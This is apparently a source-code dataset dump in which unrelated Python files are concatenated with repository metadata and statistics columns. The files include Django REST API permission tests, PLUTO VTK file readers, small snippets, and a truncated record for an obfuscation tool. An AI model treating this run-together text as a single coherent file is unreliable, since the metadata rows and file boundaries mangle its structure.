            password='testpass123'
        )

    def test_list_sentences(self):
        """ List (get) all sentences object. """
        Sentence.objects.create(
            english_sentence='First english sentence',
        )
        url = reverse('api_v1_words_in_sentences:sentence-list')
        response = self.client.get(url, format='json')
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        # self.assertEqual(response.data[0]['english_sentence'], 'First english sentence')
        # with pagination:
        self.assertEqual(
            response.data['results'][0]['english_sentence'],
            'First english sentence'
        )

    def test_create_sentence(self):
        """ Create (post) a new sentence object. """
        # The self.client attribute will be an APIClient
        # (instead of Django's default Client) instance.
        self.client.login(
            username=self.user.username,
            password='testpass123'
        )
        url = reverse('api_v1_words_in_sentences:sentence-list')
        data = {'english_sentence': 'Second english sentence'}
        response = self.client.post(url, data, format='json')
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        self.assertEqual(Sentence.objects.count(), 1)
        self.assertEqual(Sentence.objects.get().english_sentence, 'Second english sentence')

    def test_create_sentence_not_login(self):
        """ Not login, can not Create (post) a new sentence object. """
        url = reverse('api_v1_words_in_sentences:sentence-list')
        data = {'english_sentence': 'An english sentence'}
        response = self.client.post(url, data, format='json')
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_retrieve_sentence(self):
        """ Retrieve (get) a sentence object. """
        sentence = Sentence.objects.create(
            english_sentence='Third english sentence',
        )
        response = self.client.get(
            reverse('api_v1_words_in_sentences:sentence-detail', args=(sentence.pk,)))
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        # response.data.english_sentence:
        # AttributeError: 'ReturnDict' object has no attribute 'english_sentence'
        self.assertEqual(response.data['english_sentence'], 'Third english sentence')

    def test_update_sentence(self):
        """ Update (put) a sentence object. """
        # The self.client attribute will be an APIClient
        # (instead of Django's default Client) instance.
        self.client.login(
            username=self.user.username,
            password='testpass123'
        )
        sentence = Sentence.objects.create(
            english_sentence='Fourth english sentence',
            author=self.user
        )
        url = reverse('api_v1_words_in_sentences:sentence-detail', args=(sentence.pk,))
        data = {'english_sentence': '4th english sentence'}
        response = self.client.put(url, data, format='json')
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(Sentence.objects.get().english_sentence, '4th english sentence')

    def test_update_sentence_not_creator(self):
        """ not the sentence's creator, can not Update (put) a sentence object. """
        # The self.client attribute will be an APIClient
        # (instead of Django's default Client) instance.
        self.client.login(
            username=self.user.username,
            password='testpass123'
        )
        # Sentence deliberately created without an author.
        sentence = Sentence.objects.create(
            english_sentence='An english sentence',
            # author=self.user
        )
        url = reverse('api_v1_words_in_sentences:sentence-detail', args=(sentence.pk,))
        data = {'english_sentence': 'One english sentence'}
        response = self.client.put(url, data, format='json')
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_destroy_sentence(self):
        """ Destroy (delete) a sentence object. """
        # The self.client attribute will be an APIClient
        # (instead of Django's default Client) instance.
        self.client.login(
            username=self.user.username,
            password='testpass123'
        )
        sentence = Sentence.objects.create(
            english_sentence='Fifth english sentence',
            author=self.user
        )
        url = reverse('api_v1_words_in_sentences:sentence-detail', args=(sentence.pk,))
        response = self.client.delete(url)
        self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)

    def test_destroy_sentence_not_creator(self):
        """ not the sentence's creator, can not Destroy (delete) a sentence object. """
        # The self.client attribute will be an APIClient
        # (instead of Django's default Client) instance.
        self.client.login(
            username=self.user.username,
            password='testpass123'
        )
        # Sentence deliberately created without an author.
        sentence = Sentence.objects.create(
            english_sentence='An english sentence',
            # author=self.user
        )
        url = reverse('api_v1_words_in_sentences:sentence-detail', args=(sentence.pk,))
        response = self.client.delete(url)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
class TagViewTests(APITestCase):
    """CRUD tests for the Tag API viewset.

    Covers list/create/retrieve/update/destroy plus the permission rules:
    anonymous users cannot create, and only an admin user may retrieve,
    update or delete individual tags.
    """

    @classmethod
    def setUpTestData(cls):
        # Shared, read-only fixture users created once per test class:
        # a regular user and a superuser for admin-only endpoints.
        cls.user = get_user_model().objects.create_user(
            username='Jake',
            password='testpass123'
        )
        cls.admin_user = get_user_model().objects.create_superuser(
            username='superadmin',
            password='testpass123'
        )

    def test_list_tags(self):
        """ List (get) all tags object. """
        Tag.objects.create(
            name='First tag',
        )
        url = reverse('api_v1_words_in_sentences:tag-list')
        response = self.client.get(url, format='json')
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        # self.assertEqual(response.data[0]['name'], 'First tag')
        # with pagination:
        self.assertEqual(
            response.data['results'][0]['name'],
            'First tag'
        )

    def test_create_tag(self):
        """ Create (post) a new tag object. """
        # The self.client attribute will be an APIClient
        # (instead of Django's default Client) instance.
        self.client.login(
            username=self.user.username,
            password='testpass123'
        )
        url = reverse('api_v1_words_in_sentences:tag-list')
        data = {'name': 'Second tag'}
        response = self.client.post(url, data, format='json')
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        self.assertEqual(Tag.objects.count(), 1)
        self.assertEqual(Tag.objects.get().name, 'Second tag')

    def test_create_tag_not_login(self):
        """ Not login, can not Create (post) a new tag object. """
        url = reverse('api_v1_words_in_sentences:tag-list')
        data = {'name': 'A tag'}
        response = self.client.post(url, data, format='json')
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_retrieve_tag(self):
        """ Retrieve (get) a tag object. """
        self.client.login(
            username=self.admin_user.username,
            password='testpass123'
        )
        tag = Tag.objects.create(
            name='Third tag',
        )
        response = self.client.get(
            reverse('api_v1_words_in_sentences:tag-detail', args=(tag.pk,)))
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(response.data['name'], 'Third tag')

    def test_retrieve_tag_not_admin_user(self):
        """ not the admin_user, can not Retrieve (get) a tag object. """
        tag = Tag.objects.create(
            name='A tag',
        )
        response = self.client.get(
            reverse('api_v1_words_in_sentences:tag-detail', args=(tag.pk,)))
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_update_tag(self):
        """ Update (put) a tag object. """
        # The self.client attribute will be an APIClient
        # (instead of Django's default Client) instance.
        self.client.login(
            username=self.admin_user.username,
            password='testpass123'
        )
        tag = Tag.objects.create(
            name='Fourth tag',
        )
        url = reverse('api_v1_words_in_sentences:tag-detail', args=(tag.pk,))
        data = {'name': '4th tag'}
        response = self.client.put(url, data, format='json')
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(Tag.objects.get().name, '4th tag')

    def test_update_tag_not_admin_user(self):
        """ not the admin_user, can not Update (put) a tag object. """
        # The self.client attribute will be an APIClient
        # (instead of Django's default Client) instance.
        self.client.login(
            username=self.user.username,
            password='testpass123'
        )
        tag = Tag.objects.create(
            name='A tag',
        )
        url = reverse('api_v1_words_in_sentences:tag-detail', args=(tag.pk,))
        data = {'name': 'One tag'}
        response = self.client.put(url, data, format='json')
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_destroy_tag(self):
        """ Destroy (delete) a tag object. """
        # The self.client attribute will be an APIClient
        # (instead of Django's default Client) instance.
        self.client.login(
            username=self.admin_user.username,
            password='testpass123'
        )
        tag = Tag.objects.create(
            name='Fifth tag',
        )
        url = reverse('api_v1_words_in_sentences:tag-detail', args=(tag.pk,))
        response = self.client.delete(url)
        self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)

    def test_destroy_tag_not_admin_user(self):
        """ not the admin_user, can not Destroy (delete) a tag object. """
        # The self.client attribute will be an APIClient
        # (instead of Django's default Client) instance.
        self.client.login(
            username=self.user.username,
            password='testpass123'
        )
        tag = Tag.objects.create(
            name='An tag',
        )
        url = reverse('api_v1_words_in_sentences:tag-detail', args=(tag.pk,))
        response = self.client.delete(url)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
"""
$ python manage.py test api.v1.words_in_sentences.tests.test_views --settings=a_project_config.settings.local
Creating test database for alias 'default'...
System check identified no issues (0 silenced).
.................
----------------------------------------------------------------------
Ran 17 tests in 0.734s
OK
Destroying test database for alias 'default'...
"""
| 40.48227 | 109 | 0.630256 | 1,329 | 11,416 | 5.250564 | 0.097065 | 0.054457 | 0.07581 | 0.030954 | 0.889797 | 0.844081 | 0.777157 | 0.761966 | 0.746202 | 0.735311 | 0 | 0.01498 | 0.251489 | 11,416 | 281 | 110 | 40.626335 | 0.801638 | 0.173003 | 0 | 0.562189 | 0 | 0 | 0.156558 | 0.07162 | 0 | 0 | 0 | 0 | 0.134328 | 1 | 0.094527 | false | 0.069652 | 0.029851 | 0 | 0.134328 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
f296dad22f08c97bdf64eae508a7bae51f999889 | 246 | py | Python | codes/cnn/constants.py | semaraugusto/norm-conflict-classification | 03897326b8c347eb8d2afaed35e843a2c94cc0c8 | [
"Apache-2.0"
] | 1 | 2020-12-07T10:07:41.000Z | 2020-12-07T10:07:41.000Z | codes/cnn/constants.py | semaraugusto/norm-conflict-classification | 03897326b8c347eb8d2afaed35e843a2c94cc0c8 | [
"Apache-2.0"
] | 1 | 2020-02-17T17:01:19.000Z | 2020-03-13T13:14:33.000Z | codes/cnn/constants.py | semaraugusto/norm-conflict-classification | 03897326b8c347eb8d2afaed35e843a2c94cc0c8 | [
"Apache-2.0"
] | 1 | 2020-03-05T12:58:22.000Z | 2020-03-05T12:58:22.000Z | BASE_FOLDER_PATH = 'dataset/'
CLASSIFIER_PATH = 'norm_identifier/classifiers/16-10-25_12:18:39/sentence_classifier_16-10-25_12:18:39.pkl'
NAMES_PATH = 'norm_identifier/classifiers/16-10-25_12:18:39/sentence_classifier_16-10-25_12:18:39_names.txt' | 82 | 108 | 0.829268 | 45 | 246 | 4.2 | 0.4 | 0.084656 | 0.126984 | 0.169312 | 0.751323 | 0.751323 | 0.751323 | 0.751323 | 0.751323 | 0.751323 | 0 | 0.201681 | 0.03252 | 246 | 3 | 108 | 82 | 0.592437 | 0 | 0 | 0 | 0 | 0.666667 | 0.761134 | 0.728745 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
f29a3f3c91b915f902e84064bbb7fa0b07fa1a25 | 172 | py | Python | gecosistema_lite/__init__.py | valluzzi/libcore | 1e714ed0df13000bf853696551ee109b3b65997a | [
"MIT"
] | null | null | null | gecosistema_lite/__init__.py | valluzzi/libcore | 1e714ed0df13000bf853696551ee109b3b65997a | [
"MIT"
] | null | null | null | gecosistema_lite/__init__.py | valluzzi/libcore | 1e714ed0df13000bf853696551ee109b3b65997a | [
"MIT"
] | null | null | null | from execution import *
from filesystem import *
from gdal_shape import *
# from gdal_utils import *
from gdal_wrappers import *
from strings import *
from taudem import *
| 21.5 | 27 | 0.784884 | 24 | 172 | 5.5 | 0.416667 | 0.454545 | 0.318182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.168605 | 172 | 7 | 28 | 24.571429 | 0.923077 | 0.139535 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4b39d475d43676101fbac4f3b3fdc9405c8baa6c | 10,645 | py | Python | pymcfost/plutoTools.py | TomHilder/pymcfost | 90f9e58308ec8a089100b58f805c288acd3527e9 | [
"MIT"
] | 10 | 2018-10-03T10:38:06.000Z | 2022-03-29T23:57:31.000Z | pymcfost/plutoTools.py | TomHilder/pymcfost | 90f9e58308ec8a089100b58f805c288acd3527e9 | [
"MIT"
] | 17 | 2018-10-09T05:01:56.000Z | 2021-06-07T00:00:09.000Z | pymcfost/plutoTools.py | TomHilder/pymcfost | 90f9e58308ec8a089100b58f805c288acd3527e9 | [
"MIT"
] | 13 | 2018-10-08T05:03:50.000Z | 2021-11-11T11:11:36.000Z | # -*- coding: utf-8 -*-
"""
Created on Mon Nov 3 15:23:00 2014
@author: glesur
"""
import numpy as np
class DataStructure:
    """Plain mutable namespace for VTK file contents.

    The reader attaches grid attributes (nx/ny/nz, x/y/z coordinate arrays)
    and a ``data`` dict of field arrays to instances of this class.
    """
    pass
# Read a vtk file
def readVTKCart(filename):
    """Read a PLUTO binary VTK file on a RECTILINEAR_GRID (Cartesian or cylindrical).

    Parameters
    ----------
    filename : str
        Path to the .vtk file.

    Returns
    -------
    DataStructure
        With nx/ny/nz, coordinates x/y/z (cell centers for CELL_DATA, raw
        points for POINT_DATA) and a ``data`` dict of numpy arrays indexed
        as [nx, ny, nz]. Returns 0 on open error or wrong grid type.
    """
    try:
        fid=open(filename,"rb")
    except:
        print("Can't open file")
        return 0
    # define our datastructure
    V=DataStructure()
    # raw data which will be read from the file
    V.data={}
    # datatype we read
    dt=np.dtype(">f") # Big endian single precision floats
    s=fid.readline() # VTK DataFile Version x.x
    s=fid.readline() # Comments
    s=fid.readline() # BINARY
    s=fid.readline() # DATASET RECTILINEAR_GRID
    slist=s.split()
    grid_type=str(slist[1],'utf-8')
    if(grid_type != "RECTILINEAR_GRID"):
        print("ERROR: Wrong VTK file type.")
        print("This routine can only open Cartesian or Cylindrical VTK files.")
        fid.close()
        return 0
    s=fid.readline() # DIMENSIONS NX NY NZ
    slist=s.split()
    V.nx=int(slist[1])
    V.ny=int(slist[2])
    V.nz=int(slist[3])
    s=fid.readline() # X_COORDINATES NX float
    x=np.fromfile(fid,dt,V.nx)
    s=fid.readline() # Extra line feed added by pluto
    s=fid.readline() # Y_COORDINATES NY float
    y=np.fromfile(fid,dt,V.ny)
    s=fid.readline() # Extra line feed added by pluto
    s=fid.readline() # Z_COORDINATES NZ float
    z=np.fromfile(fid,dt,V.nz)
    s=fid.readline() # Extra line feed added by pluto
    s=fid.readline() # POINT_DATA NXNYNZ
    slist=s.split()
    point_type=str(slist[0],'utf-8')
    npoints=int(slist[1])
    s=fid.readline() # EXTRA LINE FEED
    if(point_type == "CELL_DATA"):
        # The file contains face coordinates, so we extrapolate to get
        # the cell center coordinates (midpoint of consecutive faces).
        if V.nx>1:
            V.nx=V.nx-1
            V.x=0.5*(x[1:]+x[:-1])
        else:
            V.x=x
        if V.ny>1:
            V.ny=V.ny-1
            V.y=0.5*(y[1:]+y[:-1])
        else:
            V.y=y
        if V.nz>1:
            V.nz=V.nz-1
            V.z=0.5*(z[1:]+z[:-1])
        else:
            V.z=z
    elif(point_type == "POINT_DATA"):
        V.x=x
        V.y=y
        V.z=z
    # NOTE(review): any other point_type leaves V.x/V.y/V.z unset; and the
    # size mismatch below only warns, it does not abort — confirm intended.
    if V.nx*V.ny*V.nz != npoints:
        print("ERROR: Grid size incompatible with number of points in the data set")
    # Read the variable fields until end of file.
    while 1:
        s=fid.readline() # SCALARS/VECTORS name data_type (ex: SCALARS imagedata unsigned_char)
        if len(s)<2: # leave if end of file
            break
        slist=s.split()
        datatype=str(slist[0],'utf-8')
        varname=str(slist[1],'utf-8')
        if datatype == "SCALARS":
            fid.readline() # LOOKUP TABLE
            # File stores fortran-like (z,y,x); transpose to [nx,ny,nz]
            V.data[varname] = np.transpose(np.fromfile(fid,dt,V.nx*V.ny*V.nz).reshape(V.nz,V.ny,V.nx))
        elif datatype == "VECTORS":
            # Components are interleaved (X0,Y0,Z0,X1,...)
            Q=np.fromfile(fid,dt,3*V.nx*V.ny*V.nz)
            V.data[varname+'_X']=np.transpose(Q[::3].reshape(V.nz,V.ny,V.nx))
            V.data[varname+'_Y']=np.transpose(Q[1::3].reshape(V.nz,V.ny,V.nx))
            V.data[varname+'_Z']=np.transpose(Q[2::3].reshape(V.nz,V.ny,V.nx))
        else:
            print("ERROR: Unknown datatype %s" % datatype)
            break;
        fid.readline() #extra line feed
    fid.close()
    return V
# Read a vtk file
def readVTKPolar(filename):
    """Read a PLUTO binary VTK file on a polar STRUCTURED_GRID.

    The Cartesian point coordinates stored in the file are converted back to
    cylindrical cell-center coordinates.

    Parameters
    ----------
    filename : str
        Path to the .vtk file.

    Returns
    -------
    DataStructure
        With nx/ny/nz, x (radius), y (azimuth in [-pi, pi)), z, the raw
        ``points`` buffer and a ``data`` dict of numpy arrays indexed as
        [nx, ny, nz]. Returns 0 on any error.
    """
    try:
        fid=open(filename,"rb")
    except:
        print("Can't open file")
        return 0
    # define our datastructure
    V=DataStructure()
    # raw data which will be read from the file
    V.data={}
    # datatype we read
    dt=np.dtype(">f") # Big endian single precision floats
    s=fid.readline() # VTK DataFile Version x.x
    s=fid.readline() # Comments
    s=fid.readline() # BINARY
    s=fid.readline() # DATASET STRUCTURED_GRID
    # FIX: removed the leftover debug prints (raw header bytes and nx/ny/nz)
    # for consistency with readVTKCart/readVTKSpherical, which are silent.
    slist=s.split()
    grid_type=str(slist[1],'utf-8')
    if(grid_type != "STRUCTURED_GRID"):
        print("ERROR: Wrong VTK file type.")
        print("Current type is: %s"%(grid_type))
        print("This routine can only open Polar VTK files.")
        fid.close()
        return 0
    s=fid.readline() # DIMENSIONS NX NY NZ
    slist=s.split()
    V.nx=int(slist[1])
    V.ny=int(slist[2])
    V.nz=int(slist[3])
    s=fid.readline() # POINTS NXNYNZ float
    slist=s.split()
    npoints=int(slist[1])
    points=np.fromfile(fid,dt,3*npoints)
    s=fid.readline() # EXTRA LINE FEED
    V.points=points
    if V.nx*V.ny*V.nz != npoints:
        print("ERROR: Grid size incompatible with number of points in the data set")
        return 0
    # Reconstruct the polar coordinate system from the Cartesian point coords
    x1d=points[::3]
    y1d=points[1::3]
    z1d=points[2::3]
    xcart=np.transpose(x1d.reshape(V.nz,V.ny,V.nx))
    ycart=np.transpose(y1d.reshape(V.nz,V.ny,V.nx))
    zcart=np.transpose(z1d.reshape(V.nz,V.ny,V.nx))
    r=np.sqrt(xcart[:,0,0]**2+ycart[:,0,0]**2)
    theta=np.unwrap(np.arctan2(ycart[0,:,0],xcart[0,:,0]))
    z=zcart[0,0,:]
    s=fid.readline() # CELL_DATA (NX-1)(NY-1)(NZ-1)
    slist=s.split()
    data_type=str(slist[0],'utf-8')
    if(data_type != "CELL_DATA"):
        print("ERROR: this routine expect CELL DATA as produced by PLUTO.")
        fid.close()
        return 0
    s=fid.readline() # Line feed
    # Perform averaging on coordinate system to get cell centers
    # The file contains face coordinates, so we average consecutive faces.
    if V.nx>1:
        V.nx=V.nx-1
        V.x=0.5*(r[1:]+r[:-1])
    else:
        V.x=r
    if V.ny>1:
        V.ny=V.ny-1
        # wrap the averaged angle back into [-pi, pi)
        V.y=(0.5*(theta[1:]+theta[:-1])+np.pi)%(2.0*np.pi)-np.pi
    else:
        V.y=theta
    if V.nz>1:
        V.nz=V.nz-1
        V.z=0.5*(z[1:]+z[:-1])
    else:
        V.z=z
    # Read the variable fields until end of file.
    while 1:
        s=fid.readline() # SCALARS/VECTORS name data_type (ex: SCALARS imagedata unsigned_char)
        if len(s)<2: # leave if end of file
            break
        slist=s.split()
        datatype=str(slist[0],'utf-8')
        varname=str(slist[1],'utf-8')
        if datatype == "SCALARS":
            fid.readline() # LOOKUP TABLE
            V.data[varname] = np.transpose(np.fromfile(fid,dt,V.nx*V.ny*V.nz).reshape(V.nz,V.ny,V.nx))
        elif datatype == "VECTORS":
            # Components are interleaved (X0,Y0,Z0,X1,...)
            Q=np.fromfile(fid,dt,3*V.nx*V.ny*V.nz)
            V.data[varname+'_X']=np.transpose(Q[::3].reshape(V.nz,V.ny,V.nx))
            V.data[varname+'_Y']=np.transpose(Q[1::3].reshape(V.nz,V.ny,V.nx))
            V.data[varname+'_Z']=np.transpose(Q[2::3].reshape(V.nz,V.ny,V.nx))
        else:
            print("ERROR: Unknown datatype %s" % datatype)
            break
        fid.readline() # extra line feed
    fid.close()
    return V
# Read a vtk file
def readVTKSpherical(filename):
    """Read a PLUTO binary VTK file on a spherical STRUCTURED_GRID.

    The Cartesian point coordinates stored in the file are converted back to
    spherical cell-center coordinates (r, theta, phi). 2D files (nz == 1) use
    a different axis convention for the reconstruction.

    Parameters
    ----------
    filename : str
        Path to the .vtk file.

    Returns
    -------
    DataStructure
        With nx/ny/nz, coordinates r/theta/phi and a ``data`` dict of numpy
        arrays indexed as [nx, ny, nz]. Returns 0 on any error.
    """
    try:
        fid=open(filename,"rb")
    except:
        print("Can't open file")
        return 0
    # define our datastructure
    V=DataStructure()
    # raw data which will be read from the file
    V.data={}
    # datatype we read
    dt=np.dtype(">f") # Big endian single precision floats
    s=fid.readline() # VTK DataFile Version x.x
    s=fid.readline() # Comments
    s=fid.readline() # BINARY
    s=fid.readline() # DATASET STRUCTURED_GRID
    slist=s.split()
    grid_type=str(slist[1],'utf-8')
    if(grid_type != "STRUCTURED_GRID"):
        print("ERROR: Wrong VTK file type.")
        print("This routine can only open Spherical VTK files.")
        fid.close()
        return 0
    s=fid.readline() # DIMENSIONS NX NY NZ
    slist=s.split()
    V.nx=int(slist[1])
    V.ny=int(slist[2])
    V.nz=int(slist[3])
    if(V.nz==1):
        is2d=1
    else:
        is2d=0
    s=fid.readline() # POINTS NXNYNZ float
    slist=s.split()
    npoints=int(slist[1])
    points=np.fromfile(fid,dt,3*npoints)
    s=fid.readline() # EXTRA LINE FEED
    V.points=points
    if V.nx*V.ny*V.nz != npoints:
        print("ERROR: Grid size incompatible with number of points in the data set")
        return 0
    # Reconstruct the spherical coordinate system from the Cartesian coords
    x1d=points[::3]
    y1d=points[1::3]
    z1d=points[2::3]
    xcart=np.transpose(x1d.reshape(V.nz,V.ny,V.nx))
    ycart=np.transpose(y1d.reshape(V.nz,V.ny,V.nx))
    zcart=np.transpose(z1d.reshape(V.nz,V.ny,V.nx))
    if(is2d):
        r=np.sqrt(xcart[:,0,0]**2+ycart[:,0,0]**2)
        phi=np.unwrap(np.arctan2(zcart[0,0,:],xcart[0,0,:]))
        theta=np.arccos(ycart[0,:,0]/np.sqrt(xcart[0,:,0]**2+ycart[0,:,0]**2))
    else:
        r=np.sqrt(xcart[:,0,0]**2+ycart[:,0,0]**2+zcart[:,0,0]**2)
        phi=np.unwrap(np.arctan2(ycart[0,0,:],xcart[0,0,:]))
        theta=np.arccos(zcart[0,:,0]/np.sqrt(xcart[0,:,0]**2+ycart[0,:,0]**2+zcart[0,:,0]**2))
    s=fid.readline() # CELL_DATA (NX-1)(NY-1)(NZ-1)
    slist=s.split()
    data_type=str(slist[0],'utf-8')
    if(data_type != "CELL_DATA"):
        print("ERROR: this routine expect CELL DATA as produced by PLUTO.")
        fid.close()
        return 0
    s=fid.readline() # Line feed
    # Perform averaging on coordinate system to get cell centers
    # The file contains face coordinates, so we average consecutive faces.
    if V.nx>1:
        V.nx=V.nx-1
        V.r=0.5*(r[1:]+r[:-1])
    else:
        # BUGFIX: the original assigned only V.x here while the multi-cell
        # branch assigns V.r, so callers reading V.r crashed when nx == 1.
        # V.x is kept as an alias for backward compatibility.
        V.r=r
        V.x=r
    if V.ny>1:
        V.ny=V.ny-1
        V.theta=0.5*(theta[1:]+theta[:-1])
    else:
        # BUGFIX: same inconsistency as above (V.y vs V.theta).
        V.theta=theta
        V.y=theta
    if V.nz>1:
        V.nz=V.nz-1
        # wrap the averaged angle back into [-pi, pi)
        V.phi=(0.5*(phi[1:]+phi[:-1])+np.pi)%(2.0*np.pi)-np.pi
    else:
        V.phi=phi
    # Read the variable fields until end of file.
    while 1:
        s=fid.readline() # SCALARS/VECTORS name data_type (ex: SCALARS imagedata unsigned_char)
        if len(s)<2: # leave if end of file
            break
        slist=s.split()
        datatype=str(slist[0],'utf-8')
        varname=str(slist[1],'utf-8')
        if datatype == "SCALARS":
            fid.readline() # LOOKUP TABLE
            V.data[varname] = np.transpose(np.fromfile(fid,dt,V.nx*V.ny*V.nz).reshape(V.nz,V.ny,V.nx))
        elif datatype == "VECTORS":
            # Components are interleaved (X0,Y0,Z0,X1,...)
            Q=np.fromfile(fid,dt,3*V.nx*V.ny*V.nz)
            V.data[varname+'_X']=np.transpose(Q[::3].reshape(V.nz,V.ny,V.nx))
            V.data[varname+'_Y']=np.transpose(Q[1::3].reshape(V.nz,V.ny,V.nx))
            V.data[varname+'_Z']=np.transpose(Q[2::3].reshape(V.nz,V.ny,V.nx))
        else:
            print("ERROR: Unknown datatype %s" % datatype)
            break
        fid.readline() # extra line feed
    fid.close()
    return V
| 28.462567 | 102 | 0.55923 | 1,713 | 10,645 | 3.44892 | 0.102744 | 0.021327 | 0.07109 | 0.033514 | 0.923155 | 0.914861 | 0.898951 | 0.888456 | 0.878639 | 0.878639 | 0 | 0.030096 | 0.27271 | 10,645 | 373 | 103 | 28.538874 | 0.733015 | 0.190418 | 0 | 0.859779 | 0 | 0 | 0.108469 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.01107 | false | 0.00369 | 0.00369 | 0 | 0.066421 | 0.073801 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4b4bd9c583e0d3f16350ddf3d96c7d333d77cf44 | 95 | py | Python | experiement/multiwoz/torchfly_old_version/utils/__init__.py | RoderickGu/Pretraining_GPT | 0a3ecd38116dc271e273f57490b9b45b660bf401 | [
"Apache-2.0"
] | 4 | 2019-11-18T09:36:04.000Z | 2019-12-11T18:30:16.000Z | experiement/multiwoz/torchfly_old_version/utils/__init__.py | RoderickGu/Pretraining_GPT | 0a3ecd38116dc271e273f57490b9b45b660bf401 | [
"Apache-2.0"
] | null | null | null | experiement/multiwoz/torchfly_old_version/utils/__init__.py | RoderickGu/Pretraining_GPT | 0a3ecd38116dc271e273f57490b9b45b660bf401 | [
"Apache-2.0"
] | null | null | null | from .progress_bar import progress_bar, master_bar
from .set_random_seed import set_random_seed | 47.5 | 50 | 0.884211 | 16 | 95 | 4.8125 | 0.5 | 0.285714 | 0.337662 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.084211 | 95 | 2 | 51 | 47.5 | 0.885057 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4b6170f9bfd4d945175e38dd3fbf19362fdacd9b | 203 | py | Python | snippets/py/array/add/add.py | snippetfinder/The-Quick-Snippet-Reference | 4d2c38cb3687f31428539b6c9cdb11abdd4c6682 | [
"BSL-1.0"
] | 10 | 2022-01-13T15:56:14.000Z | 2022-01-21T20:43:29.000Z | snippets/py/array/add/add.py | snippetfinder/The-Quick-Snippet-Reference | 4d2c38cb3687f31428539b6c9cdb11abdd4c6682 | [
"BSL-1.0"
] | 1 | 2022-01-21T20:33:13.000Z | 2022-01-22T20:26:57.000Z | snippets/py/array/add/add.py | snippetfinder/The-Quick-Snippet-Reference | 4d2c38cb3687f31428539b6c9cdb11abdd4c6682 | [
"BSL-1.0"
] | null | null | null | array = [3, 2]
item = 1
print(array)  # [3, 2]
array.append(item)  # append the single item in place
print(array)  # [3, 2, 1]
# Equivalent alternative: merge a one-element list instead of append():
array = [3, 2]
item = 1
print(array)  # [3, 2]
array += [item]  # in-place concatenation; same result as append(item)
print(array) # [3, 2, 1] | 16.916667 | 25 | 0.507389 | 36 | 203 | 2.916667 | 0.25 | 0.342857 | 0.4 | 0.457143 | 0.895238 | 0.895238 | 0.895238 | 0.552381 | 0.552381 | 0.552381 | 0 | 0.105263 | 0.251232 | 203 | 12 | 26 | 16.916667 | 0.572368 | 0.216749 | 0 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.4 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4b92696e1f3759396763deb57c794769d4d3b47b | 63,618 | py | Python | intensio/core/obfuscation/intensio_padding.py | Warlockk/Intensio-Obfuscator | befaf1cfd2f7320266f07ef036542413317b3d9b | [
"MIT"
] | 1 | 2020-02-25T10:54:44.000Z | 2020-02-25T10:54:44.000Z | intensio/core/obfuscation/intensio_padding.py | Warlockk/Intensio-Obfuscator | befaf1cfd2f7320266f07ef036542413317b3d9b | [
"MIT"
